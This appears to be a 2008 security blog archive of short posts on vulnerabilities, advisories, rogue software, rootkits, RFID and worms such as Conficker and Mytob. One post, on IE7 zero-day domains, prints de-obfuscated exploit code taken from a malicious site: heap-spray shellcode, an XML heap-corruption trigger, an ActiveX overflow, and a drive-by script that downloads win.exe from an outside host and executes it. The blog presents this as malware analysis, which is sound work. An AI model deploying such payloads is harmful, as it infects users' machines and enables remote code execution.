
CastleCops no more online....

2008-12-28T10:33:00.001-08:00

The famous anti-malware website www.castlecops.com abruptly goes offline.
read the full story here
http://it.slashdot.org/article.pl?sid=08%2F12%2F27%2F1624220&from=rss

New Zero day on Microsoft SQL Server Stored Procedure 'sp_replwritetovarbin'

2008-12-23T02:07:00.001-08:00

MS SQL is having a Remote Memory Corruption Vulnerability on its stored procedure 'sp_replwritetovarbin' Microsoft has released a advisory on this (Microsoft Security Advisory (961040)).

This could be exploited by sending a payload with specially crafted values which could result in a memory corruption, and then this could be exploited to execute arbitrary code with the privileges of the current user. But authentication is required to exploit this vulnerability, it is also exploitable via SQL injection, by using the authentication credentials of the vulnerable web application. A proof-of-concept is already been publicly available at places for this vulnerability.

Some workarounds as given by the vendor is as follows, Details can be found at the following link.

Vendor URL

http://www.microsoft.com/technet/security/advisory/961040.mspx

• Use one of the following procedures:

•

To deny access to the stored procedure, connect to SQL Server as a sysadmin using osql.exe or sqlcmd.exe or through SQL Server Management Studio and execute the following T-SQL script:

use master

deny execute on sp_replwritetovarbin to public

· To deny access to the stored procedure using SQL Server administration:

•

For SQL Server 2000:

1.	Connect to SQL Server using Enterprise Manager as a sysadmin
2.	From the SQL Server Enterprise Manager window, select the desired server
3.	Expand the databases
4.	Expand Master
5.	Click Extended Stored Procedures. A list of stored procedures appears.
6.	From the list of stored procedures, right-click sp_replwritetovarbin and select Properties
7.	In the Properties window, click Permissions
8.	Under Users/Database Roles/Public, find Public, then click the box in the EXEC column. The box turns into a red X.
9.	Click OK twice

•

For SQL Server 2005:

1.	Connect to SQL Server using SQL Server Management Studio as a sysadmin
2.	From the Object Explorer window, select the desired server
3.	Expand the databases and the system databases
4.	Expand Master
5.	Expand Programmability
6.	Click Extended Stored Procedures. A list of stored procedures appears.
7.	From the list of stored procedures, right-click sp_replwritetovarbin and select Properties
8.	In the Properties window, click Permissions
9.	Click Deny execution beside the desired user IDs and click OK

References:

http://www.sans.org/newsletters/risk/display.php?v=7&i=50#widely10

http://securitytracker.com/alerts/2008/Dec/1021363.html

http://www.milw0rm.com/exploits/7501

http://www.securityfocus.com/bid/32710/discuss

Internet is too slow from Past few days......

2008-12-22T12:46:00.001-08:00

As you all may be facing a problem in using internet from past 2-3 days,
the reason is that communications cables between the Middle East and Europe were disrupted, which was connecting Italy and Egypt in the Mediterranean Sea were damaged.

read the full story here
http://www.bloomberg.com/apps/news?pid=20601085&sid=aH.VPx226QVo&refer=europe

Relief for MAC users Now, from Viruses......

2008-12-22T12:42:00.000-08:00

Symantec has released anti virus for MAC OS,

Some of the features are as follows....

Antiphishing
Identity protection
Internet worm protection
Two-way firewall
Vulnerability protection
Integrated, nonintrusive security suite with a simple, easy-to-use interface that includes protection found in Norton AntiVirus™ 11 for Mac®, Norton™ Confidential, and two-way firewall functionality.
Automatically detects and removes spyware, viruses, Trojan horses, malware, and Internet worms.
Detects and automatically removes online threats.
Scans and cleans downloaded files and email attachments.
Monitors email and instant messages for threats so you can exchange files freely.

For further details and download of the AntiVirus software please visit.

http://www.symantec.com/norton/macintosh/internet-security

New Posts to Come...

2008-12-22T12:22:00.001-08:00

Hi All readers there is a new article coming up in Rootkits very shortly....
Please do keep checking on the blog....

Regards
W&E

Chinese doing Corporate espionage.....on Indian IT Firms

2008-12-19T11:13:00.001-08:00

".......A few months ago, a major Bangalore-based infotech company lost out on a $8 million contract. The company was expecting a business delegation to visit India before signing the contract, but 15 days before the date set for the deal, the meeting was abruptly called off.

The same team went to China instead. When the Indian firm investigated the matter, it discovered a gaping hole in its security. The computers of several of its top executives had been compromised by Chinese hackers and privileged information leaked to a Chinese competitor, who walked away with the deal by quoting a lesser price.

Welcome to war of another kind - corporate espionage........."

Read the full story here http://www.dnaindia.com/report.asp?newsid=1213993&pageid=0

IE 7 Zero day Exploit delivering Domain Demystified

2008-12-19T02:16:00.001-08:00

Hi all, i was observing the internet community was facing the heat of IE 7 zero day exploits being on the wild. I came accross some domains who are hosting the malwares for IE7, it was using IE 7 XML heap corruption, Snapshot Viewer Activex Exploit, NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit, and many others. I tried to decode the obfuscation at multiple locations in the website, the decoded versions are given below with the locations of the files.

Domain: 17gamo . com

Malware Information:

http://safeweb.norton.com/report/show?url=www.17gamo.com&x=0&y=0

Location 1: IE 7 Zero day Exploit.

http://[BLOCKED]17gamo.com/co/ie7 . htm

Exploit used: IE XML Heap Corruption exploit

The De-obfuscated Code:

----------------------------------------------------------------------------------------------------------------------

Var shellcode=unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u772f%u7777%u732e%u6574%u6f6f%u632e%u6d6f%u612f%u6d64%u6e69%u772f%u6e69%u652e%u6578%u0000");

var spray=unescape("%u0a0a%u0a0a");

{

spray+=spray

}

while(spray.length<851968);

memory=new Array();

for(i=0;i<100;i++)

memory[i]=spray+shellcode;

xmlcode="<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.xiaolen .com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";

tag=document.getElementById("Ie70day");

tag.innerHTML=xmlcode;

----------------------------------------------------------------------------------------------------------------------

This is the exact code presented by HD Moore and otheres in MilWorm, only changes are the shellcode and the SRC=http://ਊਊ.xiaolen .com, i checked the domain xiaolen .com, its still alive,

http://www.milw0rm.com/exploits/7477

Remedy and Removal:

http://wormsandexploits.blogspot.com/2008/12/microsoft-released-security-advisory.html

Location 2: Drive By Download method used to download the malware by exploiting the XMLHTTP object of IE 7 Exploit used

http://[BLOCKED].17gamo.com/co/14 . htm

The De-obfuscated Code:

----------------------------------------------------------------------------------------------------------------------

Gameee='http:// [REMOVED] steoo . com/admin/win.exe';

Gameeename='Gameeeeee.pif';

Gameeenames='Gameeeeee.vbs';

avastt=window.document.createElement("object");

Gamex= 'Shell.Application';

Gameeeeex= 'clsid:BD96C556-65A3-11D0-983A-00C04FC29E36';

avastt.setAttribute("classid",Gameeeeex);

Gameeexml="Microsoft.XMLHTTP";

Gameeeado="Adodb.Stream";

var severr=avastt.CreateObject("Scripting.FileSystemObject","");

Gameee2=avastt.CreateObject(Gameeexml,"");

Gameee3=avastt.CreateObject(Gameeeado,"");

Gameee3.type=1;

swwsmerrr=severr.GetSpecialFolder(0);

sghgdddd=avastt.CreateObject(Gamex,"");

exp1=severr.BuildPath(swwsmerrr+'\\system32','cmd.exe');

wwwGameeecn=swwsmerrr+"\\"+Gameeename;

Gameee2.Open("GET",Gameee,0);

Gameee2.send();

Gameee3.Open();

Gameee3.Write(Gameee2.responseBody);

Gameee3.SaveToFile.(wwwGameeecn,2);

Gameee3.Close();

Gameeeuser="avastt";

wwwGameeecn2=swwsmerrr+"\\"+Gameeenames;

Gameeezf0="Set wwwGameeecn = CreateObject(\"Wscript.";

Gameeezf="Shell\")\n";

Gameeezfs="wwwGameeecn.run \"cmd /c "+wwwGameeecn+"\",vbhide";

Gameeezfx=Gameeezf0+Gameeezf+Gameeezfs;

Gameee3.type=2;

Gameee3.Open();

Gameee3.WriteText=Gameeezfx;

Gameee3.Savetofile(wwwGameeecn2,2);

Gameee3.Close();

Gameees="o";

Gameeess="p";

Gameeesss="e";

Gameeessss="n";

Gameeex='open';

sghgdddd.ShelLExeCute(exp1,' /c '+wwwGameeecn2,"",Gameeex,0)

----------------------------------------------------------------------------------------------------------------------

As you can see that the exploit is trying to downlioad "win.exe" which is a malicious file, and is detected as W32.Imaut.AS by Symantec, the full details with removal instructions are provided here

http://www.symantec.com/security_response/writeup.jsp?docid=2007-080114-2713-99&tabid=2

Location 3: It is hosting NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit for IE 7

http://[BLOCKED].17gamo.com/co/nct . htm

The De-obfuscated Code:

----------------------------------------------------------------------------------------------------------------------

test="game";

var sCode=unescape("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u772f%u7777%u732e%u6574%u6f6f%u632e%u6d6f%u612f%u6d64%u6e69%u772f%u6e69%u652e%u6578%u0000");

var sSlide=unescape("%u9090%u9090");

var heapSA=0x0c0c0c0c;

function tryMe()

{

var buffSize=5200;

var x=unescape("%0c%0c%0c%0c");

while(x.length<buffSize)x+=x;

x=x.substring(0,buffSize);

boom.SetFormatLikeSample(x)

}

function getsSlide(sSlide,sSlideSize)

{

while(sSlide.length*2<sSlideSize)

{

sSlide+=sSlide

}

sSlide=sSlide.substring(0,sSlideSize/2);

return(sSlide)

}

var heapBS=0x400000;

var sizeHDM=0x5;

var PLSize=(sCode.length*2);

var sSlideSize=heapBS-(PLSize+sizeHDM);

var heapBlocks=(heapSA+heapBS)/heapBS;

var memory=new Array();

sSlide=getsSlide(sSlide,sSlideSize);

for(i=0;

heapBlocks;

i++)

{

memory[i]=sSlide+sCode

}

----------------------------------------------------------------------------------------------------------------------

A similar POC code is already demonstrated here

http://www.bugsearch.net/it/5806/NCTsoft%20AudFile.dll%20ActiveX%20Control%20Remote%20Buffer%20Overflow%20Exploit.html

http://www.milw0rm.com/exploits/6175

There were few more locations delivering more exploits too, so the theme of the stroy is immediately block the URLs and domains you can see in this post.

Microsoft released security advisory for Internet Explorer 7 zero-day

2008-12-17T14:29:00.001-08:00

Finally after a Long wait the Advisory is released by Microsoft, for the IE7 Zero day exploit.

But there are some work around too which needs to be done.

The Internet security zone settings can be changed to prompt for before running any ActiveX Controls and Active Scripting while browsing. This can be done by raising the browsing security level in Internet Explorer to High. This sets the security level for all Web sites you visit to High. Which means no ActiveX will be executed without a prompt. You can set the internet explorer to prompt for the ActiveX execution by doing the following setting.

In Internet Explorer, click Internet Options on the Tools menu.
Click the Security tab.
Click Internet, and then click Custom Level.
Under Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.
Click Local intranet, and then click Custom Level.
Under Settings, in the Scripting section, under Active Scripting, click Prompt or Disable, and then click OK.
Click OK two times to return to Internet Explorer.

You can also Restrict Internet Explorer from using OLEDB32.dll, only to Windows Vista. Create a file named "BlockAccess_x86.inf" For 32-bit systems and "BlockAccess_x64.inf" for a 64-Bit System and then paste the following text and then save it to a temporary directory:

Code For 32-bit systems

[Unicode]

Unicode=yes

[Version]

signature="$CHICAGO$"

Revision=1

[File Security]

"%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"

Code For 64-bit systems

[Unicode]

Unicode=yes

[Version]

signature="$CHICAGO$"

Revision=1

[File Security]

"%ProgramFiles%\Common Files\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"

"%ProgramFiles(x86)%\Common Files\System\Ole DB\oledb32.dll",2,"S:(ML;;NWNRNX;;;ME)"

Once done saving the files run the following command from the temporary directory with Administrator previlages

SecEdit /configure /db BlockAccess.sdb /cfg <inf file>

you should see the following messages if Successfully done.

The task has completed successfully.

See log %windir%\security\logs\scesrv.log for detail info.

For some more detail please visit the vendor website at the following location

http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx

Reference

http://www.microsoft.com/technet/security/advisory/961051.mspx

http://www.newsoxy.com/internet-explorer/article11469.html

test

2008-12-17T14:00:00.001-08:00

Test Post

New Rouge Software, PrivacyCommander

2008-12-08T21:57:00.001-08:00

I was looking for something new to post, just came through reading about a rouge software, named as "Privacy Commander" which gives scary messages about your computer being infected with viruses and Trojans but When installed, Privacy Commander configures itself to start automatically when you start Windows. Once its loaded and running it scans the system and tells you about probable serious infections, but the truth is there is none, it actually scans the temp folder and it falsely rates the files as infected and then asks you to purchase the software to remove them, So kindly do not purchase, it's a rouge software.

It creates the following registry entries

HKEY_CURRENT_USER\Software\sysguard
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\sysguard
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "tipguard.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"=> C:\Program Files\Privacy Commander\sysguard.exe

It has this following files too.

c:\Documents and Settings\Bleeping\Desktop\Privacy Commander.lnk
c:\Documents and Settings\Bleeping\Start Menu\Programs\Privacy Commander
c:\Documents and Settings\Bleeping\Start Menu\Programs\Privacy Commander\Privacy Commander.lnk
c:\Documents and Settings\Bleeping\Start Menu\Programs\Privacy Commander\Uninstall.lnk
c:\Program Files\Privacy Commander
c:\Program Files\Privacy Commander\settings.ini
c:\Program Files\Privacy Commander\sysguard.exe
c:\Program Files\Privacy Commander\tipguard.exe
c:\Program Files\Privacy Commander\uninstall.exe
c:\Program Files\Privacy Commander\img
c:\Program Files\Privacy Commander\img\bg_fixed_de.jpg
c:\Program Files\Privacy Commander\img\bg_fixed_en.jpg
c:\Program Files\Privacy Commander\img\bg_fixed_es.jpg
c:\Program Files\Privacy Commander\img\bg_fixed_it.jpg
c:\Program Files\Privacy Commander\img\bg_licence_de.jpg
c:\Program Files\Privacy Commander\img\bg_licence_en.jpg
c:\Program Files\Privacy Commander\img\bg_licence_es.jpg
c:\Program Files\Privacy Commander\img\bg_licence_it.jpg
c:\Program Files\Privacy Commander\img\bg_main_de.jpg
c:\Program Files\Privacy Commander\img\bg_main_en.jpg
c:\Program Files\Privacy Commander\img\bg_main_es.jpg
c:\Program Files\Privacy Commander\img\bg_main_it.jpg
c:\Program Files\Privacy Commander\img\bg_warning_de.jpg
c:\Program Files\Privacy Commander\img\bg_warning_en.jpg
c:\Program Files\Privacy Commander\img\bg_warning_es.jpg
c:\Program Files\Privacy Commander\img\bg_warning_it.jpg
c:\Program Files\Privacy Commander\img\bt_activate_de.jpg
c:\Program Files\Privacy Commander\img\bt_activate_en.jpg
c:\Program Files\Privacy Commander\img\bt_activate_es.jpg
c:\Program Files\Privacy Commander\img\bt_activate_it.jpg
c:\Program Files\Privacy Commander\img\bt_cancel_de.jpg
c:\Program Files\Privacy Commander\img\bt_cancel_en.jpg
c:\Program Files\Privacy Commander\img\bt_cancel_es.jpg
c:\Program Files\Privacy Commander\img\bt_cancel_it.jpg
c:\Program Files\Privacy Commander\img\bt_fix_de.jpg
c:\Program Files\Privacy Commander\img\bt_fix_en.jpg
c:\Program Files\Privacy Commander\img\bt_fix_es.jpg
c:\Program Files\Privacy Commander\img\bt_fix_it.jpg
c:\Program Files\Privacy Commander\img\bt_ok_de.jpg
c:\Program Files\Privacy Commander\img\bt_ok_en.jpg
c:\Program Files\Privacy Commander\img\bt_ok_es.jpg
c:\Program Files\Privacy Commander\img\bt_ok_it.jpg
c:\Program Files\Privacy Commander\img\bt_silent_de.jpg
c:\Program Files\Privacy Commander\img\bt_silent_en.jpg
c:\Program Files\Privacy Commander\img\bt_silent_es.jpg
c:\Program Files\Privacy Commander\img\bt_silent_it.jpg
c:\Program Files\Privacy Commander\img\bt_upd_de.jpg
c:\Program Files\Privacy Commander\img\bt_upd_en.jpg
c:\Program Files\Privacy Commander\img\bt_upd_es.jpg
c:\Program Files\Privacy Commander\img\bt_upd_it.jpg
c:\Program Files\Privacy Commander\img\bt_update_de.jpg
c:\Program Files\Privacy Commander\img\bt_update_en.jpg
c:\Program Files\Privacy Commander\img\bt_update_es.jpg
c:\Program Files\Privacy Commander\img\bt_update_it.jpg
c:\Program Files\Privacy Commander\lang
c:\Program Files\Privacy Commander\lang\de.lng
c:\Program Files\Privacy Commander\lang\en.lng
c:\Program Files\Privacy Commander\lang\es.lng
c:\Program Files\Privacy Commander\lang\it.lng
c:\Program Files\Privacy Commander\sounds
c:\Program Files\Privacy Commander\sounds\1.mp3
c:\Program Files\Privacy Commander\sounds\2.mp3
c:\Program Files\Privacy Commander\sounds\3.mp3

Removal and Reference

Kindly visit

http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-120414-0500-99&tabid=3

Radio Frequency Identification (RFID)

2008-12-08T03:42:00.001-08:00

So Guys what are RFID, well, in simple terms it is a radio transmission which contains some type of indentification from the transmitting device and for the reciever to understand who it is. Like it can be a call sign of a radio unit the people use for normal communication, or a aircraft calling its control tower with the call sign of the aircraft.

RFID is related to all those devices and technology who use radio signals for exchanging and identifying data. Usually RFID is a small tag or label by which a object is identified. The communication happens by exchanging radio signal and then interpreting it by extracting the identification information. For example the reader asks "who or what are you?" the tag answers that, let's say, "I am object ABC-12345". This process can be even more complex, like the information can pass through various levels of encryption and then relayed to a remote server and verified with a backend database for authenticity.

There are various uses of RFID, like tracking trucks on highway, tracking bags in airport transfers, in superstores and warehouses, and many more, but the ones I found innovative while searching through the internet was in the bellow link.

http://networks.silicon.com/lans/0,39024663,39164446,00.htm

Typically RFID uses these bands of frequency for communication, Low Frequency (LF) at 125 kHz to 134 kHz, High Frequency (HF) at 13.56 MHz, and Ultra HF at 860 to 930 MHz..

Now lets talk about some security aspects related to it. There can be multiple types of attacks at different levels of RFID implementation.

Like there can be radio manipulation of radio frequency, which can be done by wrapping the RFID tag with some metal which blocks Radio Frequency, such as aluminum. This wrapping can stop the reader from reading the tag. There can be spoofing attacks against the RFID where the a attackers system is broadcasting incorrect product code over the air instead of a valid one. Even at time attackers can air the system commands as there may be less validations put for input parameters considering that there will be always a valid data input in a particular area. This is like a SQL injection in a web based scenario where an attacker injects a SQL command through URL to the Database, similarly the attacker can carry a tag containing a system command instead of a valid data. The another innovative approach is to intercept and record the valid RFID signal and then play it back to the reader, the reader thinks it correct and accepts it.

In 2004, Lukas Grunwald had written called RF Dump in Java language. The program scans for RFID tags via an ACG brand reader attached to the serial port of a computer. When the reader recognizes a card, the program presents the card data in a spreadsheet-like format on the screen. The user can then enter or change data and reflect those changes on the tag. RF Dump also makes sure that the data written is the correct length for the tag's fields, by either padding zeros or truncating extra digits as needed.

I feel there is still lots of things to say about RFID and things related to it, which I will cover in some later posts.

New Malware Analysis Partner

2008-12-02T00:24:00.001-08:00

Hi All readers

I am glad to announce that today http://malwareinfo.org and W&E become partners for Malware analysis.

W&E

Hi Readers Keep reading...

2008-11-30T12:47:00.001-08:00

Hi

Thanks for keeping an eye on my blog, I am working on bringing you all a new blog on a very special Technology and its security aspects, Mostly by another day or two.

Thanks all readers
W&E...

New Worm Attack Nov 2008: Exploting (Microsoft MS-08067)SRVSVC RPC, Remote Code Execution

2008-11-25T21:48:00.001-08:00

Hi all i was just going through the internet for some info on new worms or attacks if any, Guess what, I found a new worm which is exploiting the Exploting Microsoft SRVSVC RPC by Remote Code Execution using vulnerability MS-08-067 to propagate and exploit machines in a new way, the worm names are Win32/Conficker.A (CA), and W32.Downadup (Symantec), Symantec was the first to discover this worm.

So what it does? As far as i read and understood,

It once executed by various means from the attacker it creates a DLL fine in %system%, and deletes user created system restore points, and then it checks if the machine is WIN 2K, and if the machine is WIN2K then it injects a mallicious code in "Services.exe" process. What if the OS is not a WIN2K ? Well in that case it creates a Service with name "Netsvcs" with parameters " %System%\svchost.exe -k netsvcs " and adds a registry entry

HKLM\SYSTEM\CurrentControlSet\Services\netsvcs\Parameters\ServiceDll = "%System%\<random worm file name>.dll"

The worm has a unique speciality, which makes it propagate and infect the other machine faster is that, it connects to getmyip.org so that it can get the public IP address of the compromised computer, WOW!, then the worm downloads a mallicious file from its master's webserver (I call it like that way), and executes it to create web server on the compromised machine with some random port, and after that it passess this new URL to other computers and if they get infected then they will download the worm from the new URL of previously infected computer. So the attacker can now sleep tight and shutdown his server as its now self propagating.

For further information and mitigation i will suggest the users to follow the vendor sites in links.

Reference used:

http://www.ca.com/us/securityadvisor/virusinfo/virus.aspx?id=75911
http://www.symantec.com/business/security_response/writeup.jsp?docid=2008-112203-2408-99&tabid=1
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Some Delay in next blog...

2008-11-24T05:13:00.001-08:00

Hi Readers,

I am a bit stuck with researching a new good topic for you all, kindly expect 2-3 days delay in my next blog, kindly revisit in 3 days for an exciting blog on a latest technology which is used by most of the retail industry today and other domains of the industry too but they are facing security challenges to scale that technology up. I will bringing you all about that technology in 3 days.

Thanks
W&E---

Few Facts about RootKits....

2008-11-21T06:23:00.001-08:00

As per Wikipedia is "A rootkit is malware which consists of a program (or combination of several programs) designed to take fundamental control (in Unix terms "root" access, in Windows terms, "Administrator" or "Admin" access) of a computer system, without authorization by the system's owners and legitimate managers.

So now by that definition we all know that a Rootkit is a program which takes control of the admin users of a operating system and by doing that it takes control of the whole system and will be capable of doing anything and everything the rootkit wants technically.

Here I will be discussing about some basic facts and behavior about the rootkits.

As far as the rootkits are concerned, they mainly have two important functions which makes them unique. One is the Command and control which means the attacker can control the rootkit from a remote location and issue commands to it for several functions to perform on the victim's machine. The other function is to maintain access and listening to the victims computer for different activities on the computer of the victim, like capturing the keystrokes, peeping through the emails, network packet captures, keeping an eye on the encrypted traffic for the encryption keys and various other things. Rootkits are basically initiated by user intervention without knowing what exactly he is doing, like he may be opening a mail and that mail has a embedded HTML link which takes him to a malicious location from where the malware is downloaded and installed, once installed the rootkit program loads itself to the memory. It can even spread via malicious attachments. The rootkits looks for software glitches and holes which it can modify and keep working in stealth mode, like say if there is any glitch available in any DLL or exe file of a software then it will try to modify it in the form of software patch and then it will perform its designated functions, Sometimes the rootkits also modify some programs and they infect it with spyware. And eventually they start pushing a lots of other unwanted stuff into the infected computer.

So Guys I enough talked about what a rootkit is, its time to talk about how many types and variants are there in the wild. Well there are almost five types of rootkits known till now, namely Firmware type, which stays hidden in the source code and hard to detect, this was proved by John Heasman in ACPI and PCI expansion. The next is virtualized type, these work by modifying the systems boot sequence and is capable to intercept all hardware calls from the guest operating system as it loads the original operating system as Virtual Machine. The third type is Kernel Level type which actually sit in the system by modifying some part of the Kernel code and is very notorious and hard to detect, Application and Library Level types are the ones who actually get in to the system by modifying the actual software code by means of patch, or hooking to the software function calls or even at times changing the actual binary itself with the infected one.

Well now I hope everyone has a fair idea what a rootkit is, how it works and the various types of it. So now lets say someone is infected with, sorry I am wrong, lets say is "rooted" with a rootkit, then in that case how do you detect it on your system. The fun is that the rootkits are designed to be stealthy so its going to be a challenge for everyone to detect it, but there are some basic things what we can do, which is like if your system is taking a long time to boot, or say it crashes too frequently with blue screen of death, look for the MsConfig, see if you can see something which is not supposed to be at the startup process and does not belong to the system process, or there may be processes running in the TaskManager which you don't know. The basic system settings are disabled suddenly like you are having no access to TaskManager, MSConfig or even RegEdit and at times the combination of all three of these controls. Hard drives is busy most of the times and you can see the HDD light blinking all the times even if the system is idle, your browser takes you to pages where you are not intended to go or it launches automatically without your intervention and intention to go there, sometimes you see requests made by some processes from your system to access internet and you don't know the process or it does not looks like legitimate, there are some funny looking icons on the task bar and you cannot remove them and they keep on bugging you with irritating messages and balloon alerts from the task bar. And at times you also get some funny messages flashing on your screen too. I hope I made my point and gave lots of examples to understand and there are still plenty available.

Now I believe you all must be anxious to know some names for rootkits, well I cannot publish the names here just to keep the blog clean, but certainly let you know some famous ones, which are Trojan.Vundo, Trojan.Trojan:Win32/Virtumonde.R, W32/Trojan2.TDQ, Win32/Vundo.LV, Trojan.AdWare.Win32.SuperJuan.bh, these are only to name a few.

Last but not the least, how to remove it, well almost all major antivirus engines catch them and remove them, and people can visit the following site for a list of available tools and names for rootkits.

http://www.antirootkit.com/rootkit-list.htm

References:

http://www.informit.com/articles/article.aspx?p=408884&seqNum=5
http://resources.zdnet.co.uk/articles/0,1000001991,39523773,00.htm
http://tinyurl.com/googleBookRootkit
http://www.5starsupport.com/tutorial/rootkits.htm
http://www.rootkitonline.com/types-of-rootkits.html
http://tinyurl.com/DetectRootKitHowTo

Three London hospitals is Hit by Computer virus

2008-11-19T02:07:00.001-08:00

Today when I was going through the news sites, I read about a virus which has effected 3 London Hospitals to shutdown completely for more than 24 hours. This has happened in past 2 days. The news agencies has reported that Sir Bartholomew's (Barts) in the City, the Royal London Hospital in Whitechapel and the London Chest Hospital in Bethnal Green, were forced to shut down their systems. The impact is such bad that the Doctors are using pen and paper as backups as a result of the infection.

According to Sophos, the hospitals were infected by a variant of the Mytob worm. Which spreads via email, planting a backdoor Trojan horse which can be used by hackers to gain access and control over a victim's computer.

Reference:

http://news.cnet.com/8301-1009_3-10101392-83.html

http://www.zdnetasia.com/news/security/0,39044215,62048377,00.htm?scid=rss_z_nw

http://www.computershopper.co.uk/news/237570/virus-shuts-down-three-london-hospitals-systems.html

Now, you might all know what is MyTob virus/Trojan, I did some initial research on this and I found is that it spreads via mass mail, as it is a mass mailing worm, it does this via SMTP and sending mails to addresses which it collects from outlook or from the other available address books present in windows. And also by harvesting email addresses from the local hard disk by scanning files with extensions WAB, PL, ADB, TBB, DBX, ASP, PHP, SHTL and HTM. It also has the capability to open a backdoor and then spread via the network by exploiting the vulnerabilities mostly by exploiting the LSASS (MS04-011).

This virus/Trojan at times disable various AV and firewall products and also will often modify the local Hosts File, so that internet addresses of known security providers are redirected and thus become unavailable. These worms also connects to an Internet Relay Chat (IRC) server and join the master's chat channels there. Via these chatrooms the master of the worm can issue commands to the worm, and to a large extent remote control the infected computer.

It affects the following systems:

Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows XP

On initial run it copies itself to the windows system folder mostly by the name "MSNMSGR.EXE", "Wfdmgr.Exe". and then creates the registry entries in following locations.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\OLE

It may send mails with attachments and the Subject line like, Error Status, Server Report, Mail Transaction Failed, Mail Delivery System, hello, hi etc.

The following are the aliases I found for different AV products.

Net-Worm.Win32.Mytob.c (Kaspersky, W32/Mydoom.gen@MM (McAfee), W32.Mytob.C@mm (Symantec), Win32.HLLM.MyDoom.20 (Doctor Web), W32/Mytob-C (Sophos), WORM_MYDOOM.GEN (Trend Micro), Worm/Zusha.A (H+BEDV), Worm.Mytob.A (ClamAV), W32/Mytob.C.worm (Panda)

It has other variants like Other versions: .a, .be, .bi, .bk, .bt, .cf, .ch, .dc, .eg, .r, .t, .u, .v, .w, .x, .y

For removal instructions I would prefer all of you to visit the vendor sites as mentioned below.

References:

http://www.sophos.com/support/disinfection/worms.html

http://www.symantec.com/security_response/writeup.jsp?docid=2005-022614-4627-99&tabid=3

Cell Phone Botnets....The newest threat in 2009

2008-11-18T06:24:00.001-08:00

